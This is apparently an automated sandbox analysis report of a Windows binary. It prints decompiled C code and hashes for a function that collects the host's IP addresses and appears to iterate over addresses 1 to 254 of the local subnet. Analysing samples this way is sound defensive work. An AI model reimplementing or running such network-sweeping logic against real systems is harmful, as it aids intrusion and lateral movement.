Opcode Fuzzy Hash: 0d5e50247115c8751ce870f6dd09abb5be205527ed99982196e3514591bf444a
Instruction Fuzzy Hash: BEC1F07590020ADBEFA59F6CC884FBABBB4FF06F18F144149EE01AB650D3769941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01347F74, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindMITargetTypeInstance.LIBVCRUNTIME ref: 01347FE0
PMDtoOffset.LIBCMT ref: 01348006

Strings

Bad dynamic_cast!, xrefs: 01348048

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: FindInstanceOffsetTargetType
String ID: Bad dynamic_cast!
API String ID: 2363274979-2956939130
Opcode ID: 01a89e2e7acd2f314a2468924e498f82b71b61551440b0ea99f884732bd8953e
Instruction ID: 7ac91b63fa61c0bc11b46a540ecc35bb4634498019c96fe09859d3936c58bef9
Opcode Fuzzy Hash: 01a89e2e7acd2f314a2468924e498f82b71b61551440b0ea99f884732bd8953e
Instruction Fuzzy Hash: 30212872A1420AAFCF24DFACCD05EAE77E8EF5462CF108619E90493680D731F904C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 012F6980, Relevance: 6.2, APIs: 4, Instructions: 203
threadCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E012F6980(void* __ebx, intOrPtr* __ecx, signed int __edi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int* _v72;
				char _v76;
				intOrPtr* _v80;
				char _v84;
				signed int _v88;
				signed int* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				short _v144;
				signed int _v148;
				intOrPtr* _v168;
				char _v172;
				signed int _v180;
				intOrPtr* _v268;
				signed int _v280;
				char _v288;
				signed int _v292;
				intOrPtr _v296;
				char _v300;
				signed int _v304;
				signed int _v308;
				short _v324;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr* _v728;
				signed int _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				signed int _v744;
				char _v760;
				char _v988;
				intOrPtr* _v992;
				intOrPtr* _v996;
				void* __esi;
				void* __ebp;
				signed int _t278;
				signed int _t279;
				void* _t281;
				signed int _t312;
				signed int _t313;
				intOrPtr* _t315;
				void* _t316;
				void* _t318;
				void* _t319;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t334;
				signed int _t342;
				signed int _t350;
				signed int _t353;
				signed int _t356;
				signed int _t357;
				signed int _t361;
				int _t367;
				signed int _t368;
				signed int _t371;
				signed int _t372;
				intOrPtr _t378;
				signed int _t379;
				signed int _t383;
				intOrPtr _t384;
				signed int _t386;
				signed int _t389;
				signed int _t401;
				signed int _t411;
				signed int _t414;
				intOrPtr _t421;
				signed int _t429;
				void* _t431;
				signed int _t432;
				intOrPtr* _t449;
				signed int _t459;
				signed int _t471;
				char _t481;
				signed int _t486;
				signed int _t496;
				signed int _t503;
				intOrPtr* _t504;
				intOrPtr _t506;
				signed int _t508;
				signed int _t509;
				signed int* _t510;
				signed int _t511;
				signed int* _t513;
				signed int _t515;
				void* _t516;
				intOrPtr _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				void* _t524;
				void* _t525;
				signed int _t527;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				void* _t532;
				signed int _t533;
				void* _t535;
				void* _t536;
				signed int _t538;
				void* _t540;
				void* _t541;

				_t503 = __edi;
				_t431 = __ecx;
				_push(0xffffffff);
				_push(0x13655ad);
				_push( *[fs:0x0]);
				_t533 = _t532 - 0x40;
				_t278 =  *0x13a4018; // 0x39cca9f6
				_t279 = _t278 ^ _t529;
				_v20 = _t279;
				_push(__ebx);
				_push(__edi);
				_push(_t279);
				 *[fs:0x0] =  &_v16;
				_t281 = _a4;
				asm("xorps xmm0, xmm0");
				_v48 = _t281;
				asm("movq [ebp-0x28], xmm0");
				_v36 = 0;
				_v80 = _t281;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v8 = 0;
				asm("movq [ebp-0x1c], xmm0");
				_v24 = 0;
				_v76 = __ecx;
				_v72 =  &_v44;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_push( &_v68);
				asm("movq [ebp-0x40], xmm0");
				_v60 = 0;
				L65();
				_v8 = 2;
				_t515 = _v68;
				_t429 = _v64;
				if(_t515 == _t429) {
					L7:
					_t515 = _v32;
					_t503 = _v28;
					if(_t515 == _t503) {
						L14:
						_t504 = _v80;
						_t432 = 0;
						_v44 = 0;
						 *_t504 = _v44;
						 *((intOrPtr*)(_t504 + 4)) = _v40;
						_t286 = _v36;
						 *((intOrPtr*)(_t504 + 8)) = _v36;
						_v40 = 0;
						_v36 = 0;
						if(_v68 != 0) {
							_t486 = _t429;
							_t429 = _v68;
							_push(0);
							E012F5650(_t429, _t486);
							_push((0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2) + ((0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v60 - _t429) >> 0x20 >> 2)) * 2 << 3);
							_t286 = E012F56A0(_t429, _t504, _t429);
							_t432 = _v44;
							_t533 = _t533 + 0xc;
							_t515 = _v32;
						}
						if(_t515 != 0) {
							E012F8900(_t286, _t429, _t515, _v28, _t504, _t432);
							_push(_v24 - _v32 & 0xfffffff8);
							E012F56A0(_t429, _t504, _v32);
							_t432 = _v44;
							_t533 = _t533 + 0xc;
							_v32 = 0;
							_v28 = 0;
							_v24 = 0;
						}
						if(_t432 != 0) {
							_push(_t432);
							E012F5650(_t432, _v40);
							_push((0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2) + ((0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36 - _v44) >> 0x20 >> 2)) * 2 << 3);
							E012F56A0(_t429, _t504, _v44);
						}
						 *[fs:0x0] = _v16;
						_pop(_t516);
						return E0132EA79(_v20 ^ _t529, _t516);
					} else {
						do {
							if( *((intOrPtr*)(_t515 + 4)) == 0) {
								goto L12;
							} else {
								if( *((intOrPtr*)(_t515 + 4)) == GetCurrentThreadId()) {
									_push(5);
									E01316F3B(_t429, _t515);
									goto L22;
								} else {
									_t421 = E013174F5(_t431,  *_t515,  *((intOrPtr*)(_t515 + 4)), 0);
									_t533 = _t533 + 0xc;
									if(_t421 != 0) {
										goto L24;
									} else {
										 *_t515 = _t421;
										 *((intOrPtr*)(_t515 + 4)) = _t421;
										goto L12;
									}
								}
							}
							goto L87;
							L12:
							_t515 = _t515 + 8;
						} while (_t515 != _t503);
						_t515 = _v32;
						goto L14;
					}
				} else {
					while(1) {
						_v48 = 0;
						_t431 =  &_v48;
						E012F8C00(_t431,  &_v76, _t515);
						_v8 = 3;
						_t481 = E01349877(_t431, 0, 0, E012F8C80, _v48, 0,  &_v52);
						_t533 = _t533 + 0x1c;
						_v56 = _t481;
						if(_t481 == 0) {
							break;
						}
						_v8 = 4;
						_t431 = _v28;
						if(_t431 == _v24) {
							_t431 =  &_v32;
							E012F82F0(_t431, _t503, _t431,  &_v56);
						} else {
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x34], xmm0");
							 *_t431 = _t481;
							 *((intOrPtr*)(_t431 + 4)) = _v52;
							_v28 = _v28 + 8;
						}
						_v8 = 2;
						if(_v52 != 0) {
							L22:
							E01349908(_t429, _t431, _t481, _t503, __eflags);
							break;
						} else {
							_t515 = _t515 + 0x18;
							if(_t515 != _t429) {
								continue;
							} else {
								goto L7;
							}
						}
						goto L87;
					}
					_push(6);
					_v52 = 0;
					E01316F3B(_t429, _t515);
					L24:
					_push(2);
					E01316F3B(_t429, _t515);
					asm("int3");
					asm("int3");
					_push(_t529);
					_t530 = _t533;
					_push(0xffffffff);
					_push(0x136561b);
					_push( *[fs:0x0]);
					_t535 = _t533 - 0x98;
					_t312 =  *0x13a4018; // 0x39cca9f6
					_t313 = _t312 ^ _t530;
					_v104 = _t313;
					_push(_t515);
					_push(_t503);
					_push(_t313);
					 *[fs:0x0] =  &_v100;
					_v172 = _t431;
					_t315 = _v80;
					_t449 = _t315;
					_v180 = 0;
					_v168 = _t315;
					_t506 =  *((intOrPtr*)(_t315 + 0x14));
					_t518 =  *((intOrPtr*)(_t315 + 0x10));
					__eflags = _t506 - 8;
					if(_t506 >= 8) {
						_t449 =  *_t315;
					}
					_push(_v100);
					_t316 = E012F86C0(_t429, _t449, _t518, _t506, _t449, ".", 1);
					_t536 = _t535 + 0x10;
					__eflags = _t316 - 0xffffffff;
					if(_t316 == 0xffffffff) {
						L63:
						 *[fs:0x0] = _v20;
						_pop(_t519);
						__eflags = _v24 ^ _t530;
						return E0132EA79(_v24 ^ _t530, _t519);
					} else {
						_v68 = 0;
						_t318 = _t316 + 1;
						_v84 = 0;
						_t455 = _v88;
						__eflags = _t518 - _t318;
						_v64 = 7;
						_t319 =  <  ? _t518 : _t318;
						__eflags = _t506 - 8;
						_t508 = _v88;
						if(_t506 >= 8) {
							_t455 =  *_t508;
						}
						_push(_t319);
						E012F51B0(_t429,  &_v84, _t508, _t518, _t455);
						_v108 = 1;
						_t520 = 1;
						_v12 = 0;
						_v104 = 1;
						do {
							E012F8010(_t429,  &_v172, _t520, _t508);
							asm("movups xmm0, [ebp-0xa4]");
							_v108 = _v108 | 0x00000006;
							asm("movups [ebp-0x88], xmm0");
							asm("movq xmm0, [ebp-0x94]");
							asm("movq [ebp-0x78], xmm0");
							_v12 = 1;
							E012F8070( &_v60,  &_v84,  &_v144);
							_t536 = _t536 + 4;
							_v12 = 3;
							_t324 = _v124;
							__eflags = _t324 - 8;
							if(_t324 >= 8) {
								_push(2 + _t324 * 2);
								E012F56A0(_t429, _t508, _v144);
								_t536 = _t536 + 8;
							}
							_v128 = 0;
							_t492 =  &_v60;
							_v124 = 7;
							_t459 = _t508;
							_v144 = 0;
							_t326 = E012F8130();
							__eflags = _t326;
							if(_t326 == 0) {
								goto L58;
							} else {
								_t334 = E012F72A0(_t429, _t508,  &_v60, _t508);
								__eflags = _t334;
								if(_t334 == 0) {
									goto L58;
								} else {
									_v28 = 0;
									asm("xorps xmm0, xmm0");
									asm("movq [ebp-0x1c], xmm0");
									E012F7400(_t429, _t508,  &_v36,  &_v60);
									_v12 = 4;
									_t509 = _v36;
									_t521 = _v32;
									__eflags = _t509 - _t521;
									if(_t509 == _t521) {
										L42:
										_t510 = E012F7710(_t429, _t509,  &_v120,  &_v60);
										__eflags =  &_v36 - _t510;
										if( &_v36 == _t510) {
											_t342 = _v28;
										} else {
											__eflags = _v36;
											if(_v36 != 0) {
												_t527 = _v36;
												_push(_t459);
												E012F5650(_t527, _t521);
												_t492 = 0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2;
												_t411 = (0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2) + ((0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v28 - _t527) >> 0x20 >> 2)) * 2 << 3;
												__eflags = _t411;
												_push(_t411);
												E012F56A0(_t429, _t510, _t527);
												_t536 = _t536 + 0xc;
											}
											_t521 = _t510[1];
											_v36 =  *_t510;
											_t342 = _t510[2];
											_v32 = _t521;
											_v28 = _t342;
											 *_t510 = 0;
											_t510[1] = 0;
											_t510[2] = 0;
										}
										_t459 = _v120;
										_v96 = _t342;
										__eflags = _t459;
										if(_t459 != 0) {
											_push(_t459);
											E012F5650(_t459, _v116);
											_t459 = _v112 - _v120;
											_t492 = 0x2aaaaaab * _t459 >> 0x20 >> 2;
											_t401 = (0x2aaaaaab * _t459 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t459 >> 0x20 >> 2) + ((0x2aaaaaab * _t459 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t459 >> 0x20 >> 2)) * 2 << 3;
											__eflags = _t401;
											_push(_t401);
											E012F56A0(_t429, _t510, _v120);
											_t521 = _v32;
											_t536 = _t536 + 0xc;
											_v120 = 0;
											_v116 = 0;
											_v112 = 0;
										}
										_t509 = _v36;
										__eflags = _t509 - _t521;
										if(_t509 == _t521) {
											L55:
											_t511 = _v36;
											__eflags = _t511;
											if(_t511 != 0) {
												_push(_t459);
												E012F5650(_t511, _t521);
												_t350 = (0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2) + ((0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v96 - _t511) >> 0x20 >> 2)) * 2 << 3;
												__eflags = _t350;
												_push(_t350);
												E012F56A0(_t429, _t511, _t511);
												_t536 = _t536 + 0xc;
												_v36 = 0;
												_v32 = 0;
												_v28 = 0;
											}
											_t508 = _v88;
											_t520 = _v104;
											goto L58;
										} else {
											while(1) {
												_t522 =  *_v92;
												_v148 = _t522;
												_t353 = E01317416(_t522);
												_t538 = _t536 + 4;
												__eflags = _t353;
												if(_t353 != 0) {
													goto L64;
												}
												_v12 = 6;
												_push(_t509);
												_t389 = _v92[1];
												_v100 = _t389;
												_t459 =  *(_t389 + 4);
												__eflags = _t459 -  *((intOrPtr*)(_t389 + 8));
												if(_t459 ==  *((intOrPtr*)(_t389 + 8))) {
													_push(_t459);
													_t459 = _t389;
													E012F8140(_t459, _t509);
												} else {
													E012F60E0(_t429, _t459, _t492, _t509);
													 *((intOrPtr*)(_v100 + 4)) =  *((intOrPtr*)(_v100 + 4)) + 0x18;
												}
												_v12 = 4;
												E0131743B(_t522);
												_t521 = _v32;
												_t509 = _t509 + 0x18;
												_t536 = _t538 + 4;
												__eflags = _t509 - _t521;
												if(_t509 != _t521) {
													continue;
												} else {
													goto L55;
												}
												goto L87;
											}
											goto L64;
										}
									} else {
										while(1) {
											_t522 =  *_v92;
											_v100 = _t522;
											_t353 = E01317416(_t522);
											_t538 = _t536 + 4;
											__eflags = _t353;
											if(_t353 != 0) {
												break;
											}
											_v12 = 5;
											_push(_t509);
											_t414 = _v92[1];
											_v96 = _t414;
											_t459 =  *(_t414 + 4);
											__eflags = _t459 -  *((intOrPtr*)(_t414 + 8));
											if(_t459 ==  *((intOrPtr*)(_t414 + 8))) {
												_push(_t459);
												_t459 = _t414;
												E012F8140(_t459, _t509);
											} else {
												E012F60E0(_t429, _t459, _t492, _t509);
												 *((intOrPtr*)(_v96 + 4)) =  *((intOrPtr*)(_v96 + 4)) + 0x18;
											}
											_v12 = 4;
											E0131743B(_t522);
											_t521 = _v32;
											_t509 = _t509 + 0x18;
											_t536 = _t538 + 4;
											__eflags = _t509 - _t521;
											if(_t509 != _t521) {
												continue;
											} else {
												goto L42;
											}
											goto L87;
										}
										L64:
										E01316F0E(_t429, _t459, _t492, _t509, _t522);
										asm("int3");
										asm("int3");
										_t531 = _t538;
										_t356 =  *0x13a4018; // 0x39cca9f6
										_t357 = _t356 ^ _t531;
										_v292 = _t357;
										 *[fs:0x0] =  &_v288;
										_t523 = _v268;
										asm("xorps xmm0, xmm0");
										asm("movq [ebp-0x120], xmm0");
										_v556 = 0;
										_v992 = _t523;
										_v996 = _t523;
										_v564 = 0;
										_v560 = 0;
										_v556 = 0;
										_v280 = 0;
										E013478D0(_t509,  &_v988, 0, 0x190);
										_t540 = _t538 - 0x2e0 + 0xc;
										_t361 =  &_v988;
										__imp__#115(0x202, _t361, _t357, _t509, _t522,  *[fs:0x0], 0x1365676, 0xffffffff, _t530, _t353);
										__eflags = _t361;
										if(_t361 == 0) {
											E013478D0(_t509,  &_v288, _t361, 0x104);
											_t541 = _t540 + 0xc;
											_t367 = gethostname( &_v288, 0x104);
											__eflags = _t367 - 0xffffffff;
											if(_t367 != 0xffffffff) {
												_t368 =  &_v288;
												__imp__#52(_t368);
												_v732 = _t368;
												__eflags = _t368;
												if(_t368 != 0) {
													_t513 =  *(_t368 + 0xc);
													_t525 = 0;
													__eflags =  *((short*)(_t368 + 0xa)) - 1;
													if( *((short*)(_t368 + 0xa)) - 1 > 0) {
														while(1) {
															_t371 =  *_t513;
															__eflags = _t371;
															if(_t371 == 0) {
																goto L84;
															}
															_t513 =  &(_t513[1]);
															__imp__#12( *_t371);
															_t496 = _t371;
															__eflags = _t496;
															if(_t496 != 0) {
																_t233 = _t371 + 1; // 0x1
																_v744 = 0;
																_v740 = 0xf;
																_v760 = 0;
																_v736 = _t233;
																do {
																	_t471 =  *_t371;
																	_t371 = _t371 + 1;
																	__eflags = _t471;
																} while (_t471 != 0);
																_push(_t371 - _v736);
																E012F7F00(_t429,  &_v760, _t496, _t513, _t496);
																_v16 = 1;
																E012F6730(_t429,  &_v324,  &_v760, _t513);
																_v16 = 3;
																_t378 = _v740;
																__eflags = _t378 - 0x10;
																if(_t378 >= 0x10) {
																	_t386 = _t378 + 1;
																	__eflags = _t386;
																	_push(_t386);
																	E012F56A0(_t429, _t513, _v760);
																	_t541 = _t541 + 8;
																}
																__eflags = _v308;
																_v744 = 0;
																_v740 = 0xf;
																_v760 = 0;
																if(_v308 == 0) {
																	L80:
																	_t379 = _v304;
																} else {
																	_t383 = E012F72A0(_t429, _t513,  &_v324,  &_v324);
																	__eflags = _t383;
																	if(_t383 == 0) {
																		goto L80;
																	} else {
																		_t384 = _v296;
																		__eflags = _t384 - _v292;
																		if(_t384 == _v292) {
																			_push( &_v324);
																			E012F54C0(_t429,  &_v300, _t513, _t525, _t384);
																			goto L80;
																		} else {
																			 *(_t384 + 0x10) = 0;
																			 *(_t384 + 0x14) = 0;
																			asm("movups xmm0, [ebp-0x138]");
																			asm("movups [eax], xmm0");
																			asm("movq xmm0, [ebp-0x128]");
																			asm("movq [eax+0x10], xmm0");
																			_t379 = 7;
																			_v296 = _v296 + 0x18;
																			_v308 = 0;
																			_v304 = 7;
																			_v324 = 0;
																		}
																	}
																}
																_v16 = 0;
																__eflags = _t379 - 8;
																if(_t379 >= 8) {
																	_push(2 + _t379 * 2);
																	E012F56A0(_t429, _t513, _v324);
																	_t541 = _t541 + 8;
																}
															}
															_t372 = _v732;
															_t525 = _t525 + 1;
															__eflags = _t525 -  *((short*)(_t372 + 0xa)) - 1;
															if(_t525 <  *((short*)(_t372 + 0xa)) - 1) {
																continue;
															}
															goto L84;
														}
													}
													L84:
													_t523 = _v728;
												}
											}
											__imp__#116();
										}
										 *_t523 = _v300;
										 *((intOrPtr*)(_t523 + 4)) = _v296;
										 *(_t523 + 8) = _v292;
										 *[fs:0x0] = _v24;
										_pop(_t524);
										__eflags = _v28 ^ _t531;
										return E0132EA79(_v28 ^ _t531, _t524);
									}
								}
							}
							goto L87;
							L58:
							_v12 = 0;
							_t327 = _v40;
							__eflags = _t327 - 8;
							if(_t327 >= 8) {
								_push(2 + _t327 * 2);
								E012F56A0(_t429, _t508, _v60);
								_t536 = _t536 + 8;
							}
							_t520 = _t520 + 1;
							_v104 = _t520;
							__eflags = _t520 - 0xfe;
						} while (_t520 <= 0xfe);
						_t328 = _v64;
						__eflags = _t328 - 8;
						if(_t328 >= 8) {
							_push(2 + _t328 * 2);
							E012F56A0(_t429, _t508, _v84);
						}
						goto L63;
					}
				}
				L87:
			}

0x012f6980
0x012f6980
0x012f6983
0x012f6985
0x012f6990
0x012f6991
0x012f6994
0x012f6999
0x012f699b
0x012f699e
0x012f69a0
0x012f69a1
0x012f69a5
0x012f69ab
0x012f69ae
0x012f69b1
0x012f69b4
0x012f69b9
0x012f69c0
0x012f69c3
0x012f69ca
0x012f69d1
0x012f69d8
0x012f69e2
0x012f69e7
0x012f69ee
0x012f69f1
0x012f69f4
0x012f69fb
0x012f6a02
0x012f6a0c
0x012f6a10
0x012f6a11
0x012f6a16
0x012f6a1d
0x012f6a22
0x012f6a26
0x012f6a29
0x012f6a2e
0x012f6aba
0x012f6aba
0x012f6abd
0x012f6ac2
0x012f6afe
0x012f6afe
0x012f6b01
0x012f6b06
0x012f6b09
0x012f6b0e
0x012f6b11
0x012f6b14
0x012f6b17
0x012f6b1a
0x012f6b20
0x012f6b22
0x012f6b24
0x012f6b27
0x012f6b2a
0x012f6b4b
0x012f6b4d
0x012f6b52
0x012f6b55
0x012f6b58
0x012f6b58
0x012f6b5d
0x012f6b65
0x012f6b75
0x012f6b77
0x012f6b7c
0x012f6b7f
0x012f6b82
0x012f6b89
0x012f6b90
0x012f6b90
0x012f6b99
0x012f6b9e
0x012f6b9f
0x012f6bc3
0x012f6bc5
0x012f6bca
0x012f6bd2
0x012f6bdb
0x012f6bea
0x012f6ac4
0x012f6ac4
0x012f6ac8
0x00000000
0x012f6aca
0x012f6ad2
0x012f6bed
0x012f6bef
0x00000000
0x012f6ad8
0x012f6adf
0x012f6ae4
0x012f6ae9
0x00000000
0x012f6aef
0x012f6aef
0x012f6af1
0x00000000
0x012f6af1
0x012f6ae9
0x012f6ad2
0x00000000
0x012f6af4
0x012f6af4
0x012f6af7
0x012f6afb
0x00000000
0x012f6afb
0x012f6a34
0x012f6a34
0x012f6a38
0x012f6a3f
0x012f6a42
0x012f6a4a
0x012f6a62
0x012f6a64
0x012f6a67
0x012f6a6c
0x00000000
0x00000000
0x012f6a72
0x012f6a76
0x012f6a7c
0x012f6a99
0x012f6a9c
0x012f6a7e
0x012f6a81
0x012f6a84
0x012f6a89
0x012f6a8b
0x012f6a8e
0x012f6a8e
0x012f6aa1
0x012f6aa9
0x012f6bf4
0x012f6bf4
0x00000000
0x012f6aaf
0x012f6aaf
0x012f6ab4
0x00000000
0x00000000
0x00000000
0x00000000
0x012f6ab4
0x00000000
0x012f6aa9
0x012f6bf9
0x012f6bfb
0x012f6c02
0x012f6c07
0x012f6c07
0x012f6c09
0x012f6c0e
0x012f6c0f
0x012f6c10
0x012f6c11
0x012f6c13
0x012f6c15
0x012f6c20
0x012f6c21
0x012f6c27
0x012f6c2c
0x012f6c2e
0x012f6c31
0x012f6c32
0x012f6c33
0x012f6c37
0x012f6c3d
0x012f6c40
0x012f6c43
0x012f6c45
0x012f6c4c
0x012f6c4f
0x012f6c52
0x012f6c55
0x012f6c58
0x012f6c5a
0x012f6c5a
0x012f6c5c
0x012f6c69
0x012f6c6e
0x012f6c71
0x012f6c74
0x012f6fbb
0x012f6fbe
0x012f6fc7
0x012f6fcb
0x012f6fd5
0x012f6c7a
0x012f6c7c
0x012f6c83
0x012f6c84
0x012f6c88
0x012f6c8b
0x012f6c8d
0x012f6c94
0x012f6c97
0x012f6c9a
0x012f6c9c
0x012f6c9e
0x012f6c9e
0x012f6ca0
0x012f6ca5
0x012f6caa
0x012f6cb1
0x012f6cb6
0x012f6cbd
0x012f6cc0
0x012f6cc8
0x012f6ccd
0x012f6cd4
0x012f6cd8
0x012f6cdf
0x012f6ce7
0x012f6cf2
0x012f6cfd
0x012f6d02
0x012f6d05
0x012f6d09
0x012f6d0c
0x012f6d0f
0x012f6d18
0x012f6d1f
0x012f6d24
0x012f6d24
0x012f6d29
0x012f6d30
0x012f6d33
0x012f6d3a
0x012f6d3c
0x012f6d43
0x012f6d48
0x012f6d4a
0x00000000
0x012f6d50
0x012f6d55
0x012f6d5a
0x012f6d5c
0x00000000
0x012f6d62
0x012f6d65
0x012f6d70
0x012f6d74
0x012f6d79
0x012f6d7e
0x012f6d82
0x012f6d85
0x012f6d88
0x012f6d8a
0x012f6dec
0x012f6df9
0x012f6dfe
0x012f6e00
0x012f6e62
0x012f6e02
0x012f6e02
0x012f6e06
0x012f6e0a
0x012f6e0d
0x012f6e10
0x012f6e21
0x012f6e2e
0x012f6e2e
0x012f6e31
0x012f6e33
0x012f6e38
0x012f6e38
0x012f6e3d
0x012f6e40
0x012f6e43
0x012f6e46
0x012f6e49
0x012f6e4c
0x012f6e52
0x012f6e59
0x012f6e59
0x012f6e65
0x012f6e68
0x012f6e6b
0x012f6e6d
0x012f6e72
0x012f6e73
0x012f6e83
0x012f6e87
0x012f6e94
0x012f6e94
0x012f6e97
0x012f6e99
0x012f6e9e
0x012f6ea1
0x012f6ea4
0x012f6eab
0x012f6eb2
0x012f6eb2
0x012f6eb9
0x012f6ebc
0x012f6ebe
0x012f6f1f
0x012f6f1f
0x012f6f22
0x012f6f24
0x012f6f26
0x012f6f2b
0x012f6f49
0x012f6f49
0x012f6f4c
0x012f6f4e
0x012f6f53
0x012f6f56
0x012f6f5d
0x012f6f64
0x012f6f64
0x012f6f6b
0x012f6f6e
0x00000000
0x012f6ec0
0x012f6ec0
0x012f6ec3
0x012f6ec6
0x012f6ecc
0x012f6ed1
0x012f6ed4
0x012f6ed6
0x00000000
0x00000000
0x012f6edf
0x012f6ee3
0x012f6ee4
0x012f6ee7
0x012f6eea
0x012f6eed
0x012f6ef0
0x012f6f00
0x012f6f01
0x012f6f03
0x012f6ef2
0x012f6ef2
0x012f6efa
0x012f6efa
0x012f6f09
0x012f6f0d
0x012f6f12
0x012f6f15
0x012f6f18
0x012f6f1b
0x012f6f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012f6f1d
0x00000000
0x012f6ec0
0x012f6d90
0x012f6d90
0x012f6d93
0x012f6d96
0x012f6d99
0x012f6d9e
0x012f6da1
0x012f6da3
0x00000000
0x00000000
0x012f6dac
0x012f6db0
0x012f6db1
0x012f6db4
0x012f6db7
0x012f6dba
0x012f6dbd
0x012f6dcd
0x012f6dce
0x012f6dd0
0x012f6dbf
0x012f6dbf
0x012f6dc7
0x012f6dc7
0x012f6dd6
0x012f6dda
0x012f6ddf
0x012f6de2
0x012f6de5
0x012f6de8
0x012f6dea
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012f6dea
0x012f6fd8
0x012f6fd9
0x012f6fde
0x012f6fdf
0x012f6fe1
0x012f6ff7
0x012f6ffc
0x012f6ffe
0x012f7007
0x012f700d
0x012f7010
0x012f7013
0x012f701b
0x012f7025
0x012f702b
0x012f7031
0x012f703b
0x012f7045
0x012f705a
0x012f7064
0x012f7069
0x012f706c
0x012f7078
0x012f707e
0x012f7080
0x012f7093
0x012f7098
0x012f70a7
0x012f70ad
0x012f70b0
0x012f70b6
0x012f70bd
0x012f70c3
0x012f70c9
0x012f70cb
0x012f70d1
0x012f70d4
0x012f70db
0x012f70dd
0x012f70e3
0x012f70e3
0x012f70e5
0x012f70e7
0x00000000
0x00000000
0x012f70ef
0x012f70f2
0x012f70f8
0x012f70fa
0x012f70fc
0x012f7102
0x012f7105
0x012f710f
0x012f7119
0x012f7120
0x012f7126
0x012f7126
0x012f7128
0x012f7129
0x012f7129
0x012f7139
0x012f713b
0x012f7146
0x012f7150
0x012f7155
0x012f7159
0x012f715f
0x012f7162
0x012f7164
0x012f7164
0x012f7165
0x012f716c
0x012f7171
0x012f7171
0x012f7174
0x012f717b
0x012f7185
0x012f718f
0x012f7196
0x012f721a
0x012f721a
0x012f719c
0x012f71a4
0x012f71a9
0x012f71ab
0x00000000
0x012f71ad
0x012f71ad
0x012f71b3
0x012f71b9
0x012f720d
0x012f7215
0x00000000
0x012f71bb
0x012f71bb
0x012f71c4
0x012f71cb
0x012f71d2
0x012f71d5
0x012f71dd
0x012f71e2
0x012f71e7
0x012f71ee
0x012f71f8
0x012f71fe
0x012f71fe
0x012f71b9
0x012f71ab
0x012f7220
0x012f7224
0x012f7227
0x012f7230
0x012f7237
0x012f723c
0x012f723c
0x012f7227
0x012f723f
0x012f7245
0x012f724b
0x012f724d
0x00000000
0x00000000
0x00000000
0x012f724d
0x012f70e3
0x012f7253
0x012f7253
0x012f7253
0x012f70cb
0x012f7259
0x012f7259
0x012f7267
0x012f726f
0x012f7278
0x012f727e
0x012f7287
0x012f728b
0x012f7295
0x012f7295
0x012f6d8a
0x012f6d5c
0x00000000
0x012f6f71
0x012f6f71
0x012f6f75
0x012f6f78
0x012f6f7b
0x012f6f84
0x012f6f88
0x012f6f8d
0x012f6f8d
0x012f6f90
0x012f6f91
0x012f6f94
0x012f6f94
0x012f6fa0
0x012f6fa3
0x012f6fa6
0x012f6faf
0x012f6fb3
0x012f6fb8
0x00000000
0x012f6fa6
0x012f6c74
0x00000000

APIs

Part of subcall function 012F6FE0: WSAStartup.WS2_32(00000202,?), ref: 012F7078
Part of subcall function 012F6FE0: gethostname.WS2_32(?,00000104), ref: 012F70A7
Part of subcall function 012F6FE0: gethostbyname.WS2_32(?), ref: 012F70BD
Part of subcall function 012F6FE0: inet_ntoa.WS2_32(?), ref: 012F70F2

